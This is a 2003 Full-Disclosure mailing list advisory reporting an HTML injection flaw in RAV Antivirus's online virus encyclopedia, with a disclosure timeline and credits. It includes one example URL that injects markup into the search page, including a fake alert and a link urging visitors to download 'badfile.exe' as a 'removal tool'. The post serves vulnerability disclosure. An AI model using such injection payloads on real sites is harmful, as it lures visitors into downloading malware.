Full Disclosure mailing list archives
Code executing in RAV's virus encyclopedia
From: Redaktion-Kryptocrew <momolly () kryptocrew de>
Date: Thu, 4 Sep 2003 09:14:53 +0200
Vulnerability: Code executing in RAV's virus encyclopedia Found: 30 Aug 2003 Vendor: RAVantivirus Vendor notified: 03 Sept 2003 Vendor response: no Public release: 04 Sept 2003 A further crazy leak: RAV's virus encyclopedia gives attackers possibilities to inject even harmful scripts, too. RAVantivirus overlooked this fault in their virus Information websites. [Example]: http://www.ravantivirus.com/virus/by-keyword.php?k=Sobig<br><br><b>if%20you%20recieve%20a%20error%20above%20you%20must</b><br><h3><a%20href=http://www.kryptocrew.de/badfile.exe>download%20this%20removal%20tool!%20NOW!!!</a><br>testing%20your%20saftey...%20%20test Thanks to: Donnie Werner (exploitlabs.com), Roland Brecht (kryptocrew.de) & Alexander Mueller (ec-security.com) Regards G.P -- ====================================================================== G.P. Online-Redaktion =============================== Kryptocrew http://www.kryptocrew.de .: your security advisor team :. mailto:momolly () kryptocrew de ====================================================================== _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Code executing in RAV's virus encyclopedia Redaktion-Kryptocrew (Sep 04)